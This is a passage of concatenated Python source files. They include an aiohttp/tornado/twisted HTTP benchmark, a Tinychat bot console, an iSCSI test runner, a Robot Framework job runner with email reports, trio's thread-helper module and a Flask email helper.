loop.run_until_complete(srv.wait_closed())
loop.close()
if profile:
profiler.disable()
def run_tornado(host, port, barrier, profile):
import tornado.ioloop
import tornado.web
class TestHandler(tornado.web.RequestHandler):
def get(self, name):
txt = 'Hello, ' + name
self.set_header('Content-Type', 'text/plain; charset=utf-8')
self.write(txt)
class PrepareHandler(tornado.web.RequestHandler):
def get(self):
gc.collect()
self.write('OK')
class StopHandler(tornado.web.RequestHandler):
def get(self):
self.write('OK')
def on_finish(self):
tornado.ioloop.IOLoop.instance().stop()
app = tornado.web.Application([
(r'/prepare', PrepareHandler),
(r'/stop', StopHandler),
(r'/test/(.+)', TestHandler)])
app.listen(port, host)
barrier.wait()
tornado.ioloop.IOLoop.instance().start()
def run_twisted(host, port, barrier, profile):
if 'bsd' in sys.platform or sys.platform.startswith('darwin'):
from twisted.internet import kqreactor
kqreactor.install()
elif sys.platform in ['win32']:
from twisted.internet.iocpreactor import reactor as iocpreactor
iocpreactor.install()
elif sys.platform.startswith('linux'):
from twisted.internet import epollreactor
epollreactor.install()
else:
from twisted.internet import default as defaultreactor
defaultreactor.install()
from twisted.web.server import Site
from twisted.web.resource import Resource
from twisted.internet import reactor
class TestResource(Resource):
def __init__(self, name):
super().__init__()
self.name = name
self.isLeaf = name is not None
def render_GET(self, request):
txt = 'Hello, ' + self.name
request.setHeader(b'Content-Type', b'text/plain; charset=utf-8')
return txt.encode('utf8')
def getChild(self, name, request):
return TestResource(name=name.decode('utf-8'))
class PrepareResource(Resource):
isLeaf = True
def render_GET(self, request):
gc.collect()
return b'OK'
class StopResource(Resource):
isLeaf = True
def render_GET(self, request):
reactor.callLater(0.1, reactor.stop)
return b'OK'
root = Resource()
root.putChild(b'test', TestResource(None))
root.putChild(b'prepare', PrepareResource())
root.putChild(b'stop', StopResource())
site = Site(root)
reactor.listenTCP(port, site, interface=host)
barrier.wait()
reactor.run()
@asyncio.coroutine
def attack(count, concurrency, client, loop, url):
out_times = collections.deque()
processed_count = 0
def gen():
for i in range(count):
rnd = ''.join(random.sample(string.ascii_letters, 16))
yield rnd
@asyncio.coroutine
def do_bomb(in_iter):
nonlocal processed_count
for rnd in in_iter:
real_url = url + '/test/' + rnd
try:
t1 = loop.time()
resp = yield from client.get(real_url)
assert resp.status == 200, resp.status
if 'text/plain; charset=utf-8' != resp.headers['Content-Type']:
raise AssertionError('Invalid Content-Type: %r' %
resp.headers)
body = yield from resp.text()
yield from resp.release()
assert body == ('Hello, ' + rnd), rnd
t2 = loop.time()
out_times.append(t2 - t1)
processed_count += 1
except Exception:
continue
in_iter = gen()
bombers = []
for i in range(concurrency):
bomber = asyncio.async(do_bomb(in_iter))
bombers.append(bomber)
t1 = loop.time()
yield from asyncio.gather(*bombers)
t2 = loop.time()
rps = processed_count / (t2 - t1)
return rps, out_times
@asyncio.coroutine
def run(test, count, concurrency, *, loop, verbose, profile):
if verbose:
print("Prepare")
else:
print('.', end='', flush=True)
host, port = find_port()
barrier = Barrier(2)
server = Process(target=test, args=(host, port, barrier, profile))
server.start()
barrier.wait()
url = 'http://{}:{}'.format(host, port)
connector = aiohttp.TCPConnector(loop=loop)
with aiohttp.ClientSession(connector=connector) as client:
for i in range(10):
# make server hot
resp = yield from client.get(url+'/prepare')
assert resp.status == 200, resp.status
yield from resp.release()
if verbose:
test_name = test.__name__
print("Attack", test_name)
rps, data = yield from attack(count, concurrency, client, loop, url)
if verbose:
print("Done")
resp = yield from client.get(url+'/stop')
assert resp.status == 200, resp.status
yield from resp.release()
server.join()
return rps, data
def main(argv):
args = ARGS.parse_args()
count = args.count
concurrency = args.concurrency
verbose = args.verbose
tries = args.tries
loop = asyncio.get_event_loop()
suite = [run_aiohttp, run_tornado, run_twisted]
suite *= tries
random.shuffle(suite)
all_times = collections.defaultdict(list)
all_rps = collections.defaultdict(list)
for test in suite:
test_name = test.__name__
rps, times = loop.run_until_complete(run(test, count, concurrency,
loop=loop, verbose=verbose,
profile=args.profile))
all_times[test_name].extend(times)
all_rps[test_name].append(rps)
if args.profile:
profiler.dump_stats('out.prof')
print()
for test_name in sorted(all_rps):
rps = all_rps[test_name]
times = [t * 1000 for t in all_times[test_name]]
rps_mean = mean(rps)
times_mean = mean(times)
times_stdev = stdev(times)
times_median = median(times)
print('Results for', test_name)
print('RPS: {:d},\tmean: {:.3f} ms,'
'\tstandard deviation {:.3f} ms\tmedian {:.3f} ms'
.format(int(rps_mean),
times_mean,
times_stdev,
times_median))
return 0
ARGS = argparse.ArgumentParser(description="Run benchmark.")
ARGS.add_argument(
'-t', '--tries', action="store",
nargs='?', type=int, default=5,
help='count of tries (default: `%(default)s`)')
ARGS.add_argument(
'-n', '--count', action="store",
nargs='?', type=int, default=10000,
help='requests count (default: `%(default)s`)')
ARGS.add_argument(
'-c', '--concurrency', action="store",
nargs='?', type=int, default=500,
help='count of parallel requests (default: `%(default)s`)')
ARGS.add_argument(
'-p', '--plot-file-name', action="store",
type=str, default=None,
dest='plot_file_name',
help='file name for plot (default: `%(default)s`)')
ARGS.add_argument(
'-v', '--verbose', action="count", default=0,
help='verbosity level (default: `%(default)s`)')
ARGS.add_argument(
'--profile', action="store_true", default=False,
help='perform aiohttp test profiling, store result as out.prof '
'(default: `%(default)s`)')
if __name__ == '__main__':
set_start_method('spawn')
sys.exit(main(sys.argv))
|
bot.py
|
import logging
import time
import getpass
import tinybot
log = logging.getLogger(__name__)
def main():
room_name = raw_input('Enter room name: ').strip()
if tinybot.pinylib.CONFIG.ACCOUNT and tinybot.pinylib.CONFIG.PASSWORD:
bot = tinybot.TinychatBot(roomname=room_name, account=tinybot.pinylib.CONFIG.ACCOUNT,
password=tinybot.pinylib.CONFIG.PASSWORD)
else:
bot = tinybot.TinychatBot(roomname=room_name)
bot.nickname = raw_input('Enter nickname: (optional) ').strip()
do_login = raw_input('Login? [enter=No] ')
if do_login:
if not bot.account:
bot.account = raw_input('Account: ').strip()
if not bot.password:
bot.password = getpass.getpass('Password: ')
is_logged_in = bot.login()
while not is_logged_in:
bot.account = raw_input('Account: ').strip()
bot.password = getpass.getpass('Password: ')
if bot.account == '/' or bot.password == '/':
main()
break
elif bot.account == '//' or bot.password == '//':
do_login = False
break
else:
is_logged_in = bot.login()
if is_logged_in:
bot.console_write(tinybot.pinylib.COLOR['bright_green'], 'Logged in as: %s' % bot.account)
if not do_login:
bot.account = ''
bot.password = None
status = bot.set_rtmp_parameters()
while True:
if status == 1:
bot.console_write(tinybot.pinylib.COLOR['bright_red'], 'Password protected. Enter room password')
bot.room_pass = raw_input()
if bot.room_pass == '/':
main()
break
else:
status = bot.set_rtmp_parameters()
elif status == 2:
bot.console_write(tinybot.pinylib.COLOR['bright_red'], 'The room has been closed.')
main()
break
elif status == 4:
bot.console_write(tinybot.pinylib.COLOR['bright_red'], 'The response returned nothing.')
main()
break
else:
bot.console_write(tinybot.pinylib.COLOR['bright_green'], 'Connect parameters set. Connecting')
break
t = tinybot.threading.Thread(target=bot.connect)
t.daemon = True
t.start()
while not bot.is_connected:
time.sleep(2)
while bot.is_connected:
chat_msg = raw_input()
if chat_msg.startswith('/'):
msg_parts = chat_msg.split(' ')
cmd = msg_parts[0].lower().strip()
if cmd == '/q':
bot.disconnect()
if bot.is_green_connected:
bot.disconnect(greenroom=True)
elif cmd == '/a':
if len(bot.users.signed_in) is 0:
print ('No signed in users in the room.')
else:
for user in bot.users.signed_in:
print ('%s:%s' % (user.nick, user.account))
elif cmd == '/u':
for user in bot.users.all:
print ('%s: %s' % (user, bot.users.all[user].user_level))
elif cmd == '/m':
if len(bot.users.mods) is 0:
print ('No moderators in the room.')
else:
for mod in bot.users.mods:
print (mod.nick)
elif cmd == '/l':
if len(bot.users.lurkers) is 0:
print ('No lurkers in the room.')
else:
for lurker in bot.users.lurkers:
print (lurker.nick)
elif cmd == '/n':
if len(bot.users.norms) is 0:
print ('No normal users in the room.')
else:
for norm in bot.users.norms:
print (norm.nick)
elif cmd == '/b':
if len(msg_parts) is 2:
_user = bot.users.search(msg_parts[1])
if _user is not None:
if _user.user_level <= 1:
print ('Cannot ban room owner or client.')
else:
bot.send_ban_msg(_user.nick, _user.id)
else:
print ('No user named: %s' % msg_parts[1])
elif cmd == '/k':
if len(msg_parts) is 2:
_user = bot.users.search(msg_parts[1])
if _user is not None:
if _user.user_level <= 1:
print ('Cannot kick room owner or client.')
else:
bot.send_ban_msg(_user.nick, _user.id)
bot.send_forgive_msg(_user.id)
else:
print ('No user named: %s' % msg_parts[1])
else:
bot.send_chat_msg(chat_msg)
if __name__ == '__main__':
if tinybot.pinylib.CONFIG.DEBUG_TO_FILE:
formater = '%(asctime)s : %(levelname)s : %(filename)s : %(lineno)d : %(funcName)s() : %(name)s : %(message)s'
logging.basicConfig(filename=tinybot.pinylib.CONFIG.B_DEBUG_FILE_NAME,
level=tinybot.pinylib.CONFIG.DEBUG_LEVEL, format=formater)
log.info('Starting tinybot version: %s using pinylib version: %s' %
(tinybot.__version__, tinybot.pinylib.__version__))
else:
log.addHandler(logging.NullHandler())
main()
|
Chap10_Example10.3.py
|
from threading import *
def my_msgprint():
print("The above line is executed by: ", current_thread().getName())
print("Main Thread creating child object")
mthread = Thread(target = my_msgprint, name = 'MyChildThread')
print("Main Thread starting child thread")
mthread.start()
|
calsoft.py
|
import os
import time
import sys
import subprocess
import threading
import json
CALSOFT_BIN_PATH = "/usr/local/calsoft/iscsi-pcts-v1.5/bin"
'''
11/26/2015 disable tc_login_11_2 and tc_login_11_4
RFC 7143 6.3
Neither the initiator nor the target should attempt to declare or
negotiate a parameter more than once during login, except for
responses to specific keys that explicitly allow repeated key
declarations (e.g., TargetAddress)
The spec didn't make it clear what other keys could be re-declare
Disscussed this with UNH and get the conclusion that TargetName/
TargetAddress/MaxRecvDataSegmentLength could be re-declare.
'''
'''
12/1/2015 add tc_login_2_2 to known_failed_cases
RFC 7143 6.1
A standard-label MUST begin with a capital letter and must not exceed
63 characters.
key name: A standard-label
'''
known_failed_cases = ['tc_ffp_15_2', 'tc_ffp_29_2', 'tc_ffp_29_3',
'tc_err_1_1', 'tc_err_1_2', 'tc_err_2_8',
'tc_err_3_1', 'tc_err_3_2', 'tc_err_3_3',
'tc_err_3_4', 'tc_err_5_1', 'tc_login_3_1',
'tc_login_11_2', 'tc_login_11_4', 'tc_login_2_2']
def run_case(case, result_list, log_dir_path):
try:
case_log = subprocess.check_output("{}/{}".format(CALSOFT_BIN_PATH, case), stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
result_list.append({"Name": case, "Result": "FAIL"})
case_log = e.output
else:
result_list.append({"Name": case, "Result": "PASS"})
with open(log_dir_path + case + '.txt', 'w') as f:
f.write(case_log)
def main():
if not os.path.exists(CALSOFT_BIN_PATH):
print "The Calsoft test suite is not available on this machine."
sys.exit(1)
output_dir = sys.argv[1]
if len(sys.argv) > 2:
output_file = sys.argv[2]
else:
output_file = "%s/calsoft.json" % (output_dir)
log_dir = "%s/calsoft/" % output_dir
all_cases = [x for x in os.listdir(CALSOFT_BIN_PATH) if x.startswith('tc')]
all_cases.sort()
case_result_list = []
result = {"Calsoft iSCSI tests": case_result_list}
if not os.path.exists(log_dir):
os.mkdir(log_dir)
for case in known_failed_cases:
print "Skipping %s. It is known to fail." % (case)
case_result_list.append({"Name": case, "Result": "SKIP"})
thread_objs = []
left_cases = list(set(all_cases) - set(known_failed_cases))
index = 0
max_thread_count = 32
while index < len(left_cases):
cur_thread_count = 0
for thread_obj in thread_objs:
if thread_obj.is_alive():
cur_thread_count += 1
while cur_thread_count < max_thread_count and index < len(left_cases):
thread_obj = threading.Thread(target=run_case, args=(left_cases[index], case_result_list, log_dir, ))
thread_obj.start()
time.sleep(0.02)
thread_objs.append(thread_obj)
index += 1
cur_thread_count += 1
end_time = time.time() + 30
while time.time() < end_time:
for thread_obj in thread_objs:
if thread_obj.is_alive():
break
else:
break
else:
print "Thread timeout"
exit(1)
with open(output_file, 'w') as f:
json.dump(obj=result, fp=f, indent=2)
if any(["FAIL" == x["Result"] for x in case_result_list]):
print "Test case %s failed." % (x["Name"])
sys.exit(1)
if __name__ == '__main__':
main()
|
run.py
|
# -*- coding: utf-8 -*-
__author__ = "苦叶子"
"""
公众号: 开源优测
Email: lymking@foxmail.com
"""
import sys
import codecs
from flask import current_app, session, url_for, g
from flask_mail import Mail, Message
import threading
from threading import Thread
import multiprocessing
import time
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import json
from robot.api import TestSuiteBuilder, ResultWriter, ExecutionResult
from utils.file import exists_path, make_nod, write_file, read_file, mk_dirs
from staticVar import staticVar
def robot_job(app, name, username):
with app.app_context():
project = app.config["AUTO_HOME"] + "/workspace/%s/%s" % (username, name)
output = app.config["AUTO_HOME"] + "/jobs/%s/%s" % (username, name)
if not is_run(app, project):
p = multiprocessing.Process(target=robot_run, args=(username, name, project, output))
p.start()
app.config["AUTO_ROBOT"].append({"name": project, "process": p})
print("-+" * 15)
print(app.config["AUTO_ROBOT"])
print("-+" * 15)
def robot_run(username, name, project, output):
if not exists_path(output):
mk_dirs(output)
suite = TestSuiteBuilder().build(project)
(out, index) = reset_next_build_numb(output)
result = suite.run(output_directory=out,
output=out + "/output.xml",
debugfile=out + "/debug.txt",
loglevel="TRACE")
# reset_last_status(result, output, index)
# Report and xUnit files can be generated based on the result object.
# ResultWriter(result).write_results(report=out + '/report.html', log=out + '/log.html')
detail_result = ExecutionResult(out + "/output.xml")
# detail_result.save(out + "/output_new.xml")
reset_last_status(detail_result, output, index)
# Report and xUnit files can be generated based on the result object.
ResultWriter(detail_result).write_results(report=out + '/report.html', log=out + '/log.html')
send_robot_report(username, name, index, detail_result, out)
def reset_next_build_numb(output):
next_build_number = output + "/nextBuildNumber"
index = 1
data = "%d" % (index + 1)
if not exists_path(next_build_number):
make_nod(next_build_number)
else:
index = int(read_file(next_build_number)["data"])
data = "%d" % (index + 1)
write_file(next_build_number, data)
out = output + "/%d" % index
if not exists_path(output):
mk_dirs(output)
return (out, index)
def reset_last_status(result, output, index):
stats = result.statistics
fail = stats.total.critical.failed
last_fail = output + "/lastFail"
last_passed = output + "/lastPassed"
data = "%d" % index
if fail != 0:
if not exists_path(last_fail):
make_nod(last_fail)
write_file(last_fail, data)
else:
if not exists_path(last_passed):
make_nod(last_passed)
write_file(last_passed, data)
def remove_robot(app):
lock = threading.Lock()
lock.acquire()
for p in app.config["AUTO_ROBOT"]:
if not p["process"].is_alive():
app.config["AUTO_ROBOT"].remove(p)
break
lock.release()
def stop_robot(app, name):
lock = threading.Lock()
lock.acquire()
for p in app.config["AUTO_ROBOT"]:
if name == p["name"]:
if p["process"].is_alive():
p["process"].terminate()
time.sleep(0.2)
app.config["AUTO_ROBOT"].remove(p)
break
lock.release()
return True
def is_run(app, name):
remove_robot(app)
for p in app.config["AUTO_ROBOT"]:
if name == p["name"]:
return True
return False
def send_robot_report( username, name, task_no, result, output):
with staticVar.initapp.app_context():
app = current_app._get_current_object()
build_msg = "<font color='green'>Success</font>"
if result.statistics.total.critical.failed != 0:
build_msg = "<font color='red'>Failure</font>"
report_url = url_for("routes.q_view_report",
_external=True,
username=username,
project=name,
task=task_no)
msg = MIMEText("""Hello, %s<hr>
项目名称:%s<hr>
构建编号: %s<hr>
构建状态: %s<hr>
持续时间: %s毫秒<hr>
详细报告: <a href='%s'>%s</a><hr>
构建日志: <br>%s<hr><br><br>
(本邮件是程序自动下发的,请勿回复!)""" %
(username,
result.statistics.suite.stat.name,
task_no,
build_msg,
result.suite.elapsedtime,
report_url, report_url,
codecs.open(output + "/debug.txt", "r", "utf-8").read().replace("\n", "<br>")
),
"html", "utf-8")
msg["Subject"] = Header("AutoLink通知消息", "utf-8")
try:
user_path = app.config["AUTO_HOME"] + "/users/%s/config.json" % username
user_conf = json.load(codecs.open(user_path, 'r', 'utf-8'))
for p in user_conf["data"]:
if p["name"] == name:
if result.statistics.total.critical.failed != 0:
msg["To"] = p["fail_list"]
else:
msg["To"] = p["success_list"]
break
conf_path = app.config["AUTO_HOME"] + "/auto.json"
config = json.load(codecs.open(conf_path, 'r', 'utf-8'))
msg["From"] = config["smtp"]["username"]
if config["smtp"]["ssl"]:
smtp = smtplib.SMTP_SSL()
else:
smtp = smtplib.SMTP()
# 连接至服务器
smtp.connect(config["smtp"]["server"], int(config["smtp"]["port"]))
# 登录
smtp.login(config["smtp"]["username"], config["smtp"]["password"])
# 发送邮件
smtp.sendmail(msg["From"], msg["To"].split(","), msg.as_string().encode("utf8"))
# 断开连接
smtp.quit()
except Exception as e:
print("邮件发送错误: %s" % e)
class RobotRun(threading.Thread):
def __init__(self, name, output, lock, executor="auto"):
threading.Thread.__init__(self)
self.lock = lock
self.project = name
self.output = output
self.executor = executor
self.suite = None
self.result = None
def run(self):
#lock = threading.Lock()
# self.lock.acquire()
if not exists_path(self.output):
mk_dirs(self.output)
self.suite = TestSuiteBuilder().build(self.project)
(output, index) = self.reset_next_build_numb()
self.setName(output)
self.result = self.suite.run(output_directory=output,
output=output + "/output.xml",
debugfile=output + "/debug.txt",
loglevel="TRACE")
# self.reset_last_status(index)
# Report and xUnit files can be generated based on the result object.
# ResultWriter(self.result
|
_threads.py
|
import threading
import queue as stdlib_queue
from itertools import count
import attr
import outcome
import trio
from ._sync import CapacityLimiter
from ._core import enable_ki_protection, disable_ki_protection, RunVar, TrioToken
# Global due to Threading API, thread local storage for trio token
TOKEN_LOCAL = threading.local()
class BlockingTrioPortal:
def __init__(self, trio_token=None):
if trio_token is None:
trio_token = trio.hazmat.current_trio_token()
self._trio_token = trio_token
def run(self, afn, *args):
return from_thread_run(afn, *args, trio_token=self._trio_token)
def run_sync(self, fn, *args):
return from_thread_run_sync(fn, *args, trio_token=self._trio_token)
################################################################
# XX at some point it probably makes sense to implement some sort of thread
# pool? Or at least that's what everyone says.
#
# There are two arguments for thread pools:
# - speed (re-using threads instead of starting new ones)
# - throttling (if you have 1000 tasks, queue them up instead of spawning 1000
# threads and running out of memory)
#
# Regarding speed, it's not clear how much of an advantage this is. Some
# numbers on my Linux laptop:
#
# Spawning and then joining a thread:
#
# In [25]: %timeit t = threading.Thread(target=lambda: None); t.start(); t.join()
# 10000 loops, best of 3: 44 µs per loop
#
# Using a thread pool:
#
# In [26]: tpp = concurrent.futures.ThreadPoolExecutor()
# In [27]: %timeit tpp.submit(lambda: None).result()
# <warm up run elided>
# In [28]: %timeit tpp.submit(lambda: None).result()
# 10000 loops, best of 3: 40.8 µs per loop
#
# What's a fast getaddrinfo look like?
#
# # with hot DNS cache:
# In [23]: %timeit socket.getaddrinfo("google.com", "80")
# 10 loops, best of 3: 50.9 ms per loop
#
# In [29]: %timeit socket.getaddrinfo("127.0.0.1", "80")
# 100000 loops, best of 3: 9.73 µs per loop
#
#
# So... maybe we can beat concurrent.futures with a super-efficient thread
# pool or something, but there really is not a lot of headroom here.
#
# Of course other systems might be different... here's CPython 3.6 in a
# Virtualbox VM running Windows 10 on that same Linux laptop:
#
# In [13]: %timeit t = threading.Thread(target=lambda: None); t.start(); t.join()
# 10000 loops, best of 3: 127 µs per loop
#
# In [18]: %timeit tpp.submit(lambda: None).result()
# 10000 loops, best of 3: 31.9 µs per loop
#
# So on Windows there *might* be an advantage? You've gotta be doing a lot of
# connections, with very fast DNS indeed, for that 100 us to matter. But maybe
# someone is.
#
#
# Regarding throttling: this is very much a trade-off. On the one hand, you
# don't want to overwhelm the machine, obviously. On the other hand, queueing
# up work on a central thread-pool creates a central coordination point which
# can potentially create deadlocks and all kinds of fun things. This is very
# context dependent. For getaddrinfo, whatever, they'll make progress and
# complete (we hope), and you want to throttle them to some reasonable
# amount. For calling waitpid() (because just say no to SIGCHLD), then you
# really want one thread-per-waitpid(), because for all you know the user has
# written some ridiculous thing like:
#
# for p in processes:
# await spawn(p.wait)
# # Deadlock here if there are enough processes:
# await some_other_subprocess.wait()
# for p in processes:
# p.terminate()
#
# This goes doubly for the sort of wacky thread usage we see in curio.abide
# (though, I'm not sure if that's actually useful in practice in our context,
# run_in_trio_thread seems like it might be a nicer synchronization primitive
# for most uses than trying to make threading.Lock awaitable).
#
# See also this very relevant discussion:
#
# https://twistedmatrix.com/trac/ticket/5298
#
# "Interacting with the products at Rackspace which use Twisted, I've seen
# problems caused by thread-pool maximum sizes with some annoying
# regularity. The basic problem is this: if you have a hard limit on the
# number of threads, *it is not possible to write a correct program which may
# require starting a new thread to un-block a blocked pool thread*" - glyph
#
# For now, if we want to throttle getaddrinfo I think the simplest thing is
# for the socket code to have a semaphore for getaddrinfo calls.
#
# Regarding the memory overhead of threads, in theory one should be able to
# reduce this a *lot* for a thread that's just calling getaddrinfo or
# (especially) waitpid. Windows and pthreads both offer the ability to set
# thread stack size on a thread-by-thread basis. Unfortunately as of 3.6
# CPython doesn't expose this in a useful way (all you can do is set it
# globally for the whole process, so it's - ironically - not thread safe).
#
# (It's also unclear how much stack size actually matters; on a 64-bit Linux
# server with overcommit -- i.e., the most common configuration -- then AFAICT
# really the only real limit is on stack size actually *used*; how much you
# *allocate* should be pretty much irrelevant.)
_limiter_local = RunVar("limiter")
# I pulled this number out of the air; it isn't based on anything. Probably we
# should make some kind of measurements to pick a good value.
DEFAULT_LIMIT = 40
_thread_counter = count()
def current_default_thread_limiter():
"""Get the default `~trio.CapacityLimiter` used by
`trio.to_thread.run_sync`.
The most common reason to call this would be if you want to modify its
:attr:`~trio.CapacityLimiter.total_tokens` attribute.
"""
try:
limiter = _limiter_local.get()
except LookupError:
limiter = CapacityLimiter(DEFAULT_LIMIT)
_limiter_local.set(limiter)
return limiter
# Eventually we might build this into a full-fledged deadlock-detection
# system; see https://github.com/python-trio/trio/issues/182
# But for now we just need an object to stand in for the thread, so we can
# keep track of who's holding the CapacityLimiter's token.
@attr.s(frozen=True, cmp=False, hash=False)
class ThreadPlaceholder:
name = attr.ib()
@enable_ki_protection
async def to_thread_run_sync(sync_fn, *args, cancellable=False, limiter=None):
"""Convert a blocking operation into an async operation using a thread.
These two lines are equivalent::
sync_fn(*args)
await trio.to_thread.run_sync(sync_fn, *args)
except that if ``sync_fn`` takes a long time, then the first line will
block the Trio loop while it runs, while the second line allows other Trio
tasks to continue working while ``sync_fn`` runs. This is accomplished by
pushing the call to ``sync_fn(*args)`` off into a worker thread.
From inside the worker thread, you can get back into Trio using the
functions in `trio.from_thread`.
Args:
sync_fn: An arbitrary synchronous callable.
*args: Positional arguments to pass to sync_fn. If you need keyword
arguments, use :func:`functools.partial`.
cancellable (bool): Whether to allow cancellation of this operation. See
discussion below.
limiter (None, or CapacityLimiter-like object):
An object used to limit the number of simultaneous threads. Most
commonly this will be a `~trio.CapacityLimiter`, but it could be
anything providing compatible
:meth:`~trio.CapacityLimiter.acquire_on_behalf_of` and
:meth:`~trio.CapacityLimiter.release_on_behalf_of` methods. This
function will call ``acquire_on_behalf_of`` before starting the
thread, and ``release_on_behalf_of`` after the thread has finished.
If None (the default), uses the default `~trio.CapacityLimiter`, as
returned by :func:`current_default_thread_limiter`.
**Cancellation handling**: Cancellation is a tricky issue here, because
neither Python nor the operating systems it runs on provide any general
mechanism for cancelling an arbitrary synchronous function running in a
thread. This function will always check for cancellation on entry, before
starting the thread. But once the thread is running, there are two ways it
can handle being cancelled:
* If ``cancellable=False``, the function ignores the cancellation and
keeps going, just like if we had called ``sync_fn`` synchronously. This
is the default behavior.
* If ``cancellable=True``, then this function immediately raises
`~trio.Cancelled`. In this case **the thread keeps running in
background** – we just abandon it to do whatever it's going to do, and
silently discard any return value or errors that it raises. Only use
this if you know that the operation is safe and side-effect free. (For
example: :func:`trio.socket.getaddrinfo` is uses a thread with
``cancellable=True``, because it doesn't really affect anything if a
stray hostname lookup keeps running in the background.)
The ``limiter`` is only released after the thread has *actually*
finished – which in the case of cancellation may be some time after this
function has returned. If :func:`trio.run` finishes before the thread
does, then the limiter release method will never be called at all.
.. warning::
You should not use this function to call long-running CPU-bound
functions! In addition to the usual GIL-related reasons why using
threads for CPU-bound work is not very effective in Python, there is an
additional problem: on CPython, `CPU-bound threads tend to "starve out"
IO-bound threads <https://bugs.python.org/issue7946>`__, so using
threads for CPU-bound work is likely to adversely affect the main
thread running Trio. If you need to do this, you're better off using a
worker process, or perhaps PyPy (which still has a GIL, but may do a
better job of fairly allocating CPU time between threads).
Returns:
Whatever ``sync_fn(*args)`` returns.
Raises:
Exception: Whatever ``sync_fn(*args)`` raises.
"""
await trio.hazmat.checkpoint_if_cancelled()
token = trio.hazmat.current_trio_token()
if limiter is None:
limiter = current_default_thread_limiter()
# Holds a reference to the task that's blocked in this function waiting
# for the result – or None if this function was cancelled and we should
# discard the result.
task_register = [trio.hazmat.current_task()]
name = "trio-worker-{}".format(next(_thread_counter))
placeholder = ThreadPlaceholder(name)
# This function gets scheduled into the Trio run loop to deliver the
# thread's result.
def report_back_in_trio_thread_fn(result):
def do_release_then_return_result():
# release_on_behalf_of is an arbitrary user-defined method, so it
# might raise an error. If it does, we want that error to
# replace the regular return value, and if the regular return was
# already an exception then we want them to chain.
try:
return result.unwrap()
finally:
limiter.release_on_behalf_of(placeholder)
result = outcome.capture(do_release_then_return_result)
if task_register[0] is not None:
trio.hazmat.reschedule(task_register[0], result)
# This is the function that runs in the worker thread to do the actual
# work and then schedule the call to report_back_in_trio_thread_fn
# Since this is spawned in a new thread, the trio token needs to be passed
# explicitly to it so it can inject it into thread local storage
def worker_thread_fn(trio_token):
TOKEN_LOCAL.token = trio_token
try:
result = outcome.capture(sync_fn, *args)
try:
token.run_sync_soon(report_back_in_trio_thread_fn, result)
except trio.RunFinishedError:
# The entire run finished, so our particular task is certainly
# long gone -- it must have cancelled.
pass
finally:
del TOKEN_LOCAL.token
await limiter.acquire_on_behalf_of(placeholder)
try:
# daemon=True because it might get left behind if we cancel, and in
# this case shouldn't block process exit.
current_trio_token = trio.hazmat.current_trio_token()
thread = threading.Thread(
target=worker_thread_fn,
args=(current_trio_token,),
name=name,
daemon=True
)
thread.start()
except:
limiter.release_on_behalf_of(placeholder)
raise
def abort(_):
if cancellable:
task_register[0] = None
return trio.hazmat.Abort.SUCCEEDED
else:
return trio.hazmat.Abort.FAILED
return await trio.hazmat.wait_task_rescheduled(abort)
def _run_fn_as_system_task(cb, fn, *args, trio_token=None):
"""Helper function for from_thread.run and from_thread.run_sync.
Since this internally uses TrioToken.run_sync_soon, all warnings about
raised exceptions canceling all tasks should be noted.
"""
if trio_token and not isinstance(trio_token, TrioToken):
raise RuntimeError("Passed kwarg trio_token is not of type TrioToken")
if not trio_token:
try:
trio_token = TOKEN_LOCAL.token
except AttributeError:
raise RuntimeError(
"this thread wasn't created by Trio, pass kwarg trio_token=..."
)
# TODO: This is only necessary for compatibility with BlockingTrioPortal.
# once that is deprecated, this check should no longer be necessary because
# thread local storage (or the absence of) is sufficient to check if trio
# is running in a thread or not.
try:
trio.hazmat.current_task()
except RuntimeError:
pass
else:
raise RuntimeError(
"this is a blocking function; call it from a thread"
)
q = stdlib_queue.Queue()
trio_token.run_sync_soon(cb, q, fn, args)
return q.get().unwrap()
def from_thread_run(afn, *args, trio_token=None):
"""Run the given async function in the parent Trio thread, blocking until it
is complete.
Returns:
Whatever ``afn(*args)`` returns.
Returns or raises whatever the given function returns or raises. It
can also raise exceptions of its own:
Raises:
RunFinishedError: if the corresponding call to :func:`trio.run` has
already completed.
Cancelled: if the corresponding call to :func:`trio.run` completes
while ``afn(*args)`` is running, then ``afn`` is likely to raise
:exc:`trio.Cancelled`, and this will propagate out into
RuntimeError: if you try calling this from inside the Trio thread,
which would otherwise cause a deadlock.
AttributeError: if no ``trio_token`` was provided, and we can't infer
one from context.
**Locating a Trio Token**: There are two ways to specify which
`trio.run` loop to reenter:
- Spawn this thread from `trio.to_thread.run_sync`. Trio will
automatically capture the relevant Trio token and use it when you
want to re-enter Trio.
- Pass a keyword argument, ``trio_token`` specifiying a specific
`trio.run` loop to re-enter. This is useful in case you have a
"foreign" thread, spawned using some other framework, and still want
to enter Trio.
"""
def callback(q, afn, args):
@disable_ki_protection
async def unprotected_afn():
return await afn(*args)
async def await_in_trio_thread_task():
q.put_nowait(await outcome.acapture(unprotected_afn))
trio.hazmat.spawn_system_task(await_in_trio_thread_task, name=afn)
return _run_fn_as_system_task(callback, afn, *args, trio_token=trio_token)
def from_thread_run_sync(fn, *args, trio_token=None):
"""Run the given sync function in the parent Trio thread, blocking until it
is complete.
Returns:
Whatever ``fn(*args)`` returns.
Returns or raises whatever the given function returns or raises. It
can also raise exceptions of its own:
Raises:
RunFinishedError: if the corresponding call to `trio.run` has
already completed.
Cancelled: if the corresponding call to `trio.run` completes
while ``afn(*args)`` is running, then ``afn`` is likely to raise
:exc:`trio.Cancelled`, and this will propagate out into
RuntimeError: if you try calling this from inside the Trio thread,
which would otherwise cause a deadlock.
AttributeError: if no ``trio_token`` was provided, and we can't infer
one from context.
**Locating a Trio Token**: There are two ways to specify which
`trio.run` loop to reenter:
- Spawn this thread from `trio.to_thread.run_sync`. Trio will
automatically capture the relevant Trio token and use it when you
want to re-enter Trio.
- Pass a keyword argument, ``trio_token`` specifiying a specific
`trio.run` loop to re-enter. This is useful in case you have a
"foreign" thread, spawned using some other framework, and still want
to enter Trio.
"""
def callback(q, fn, args):
@disable_ki_protection
def unprotected_fn():
return fn(*args)
res = outcome.capture(unprotected_fn)
q.put_nowait(res)
return _run_fn_as_system_task(callback, fn, *args, trio_token=trio_token)
|
email.py
|
from flask import current_app, render_template
from . import mail
from flask_mail import Message
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(to, subject, template, **kwargs):
app = current_app._get_current_object()
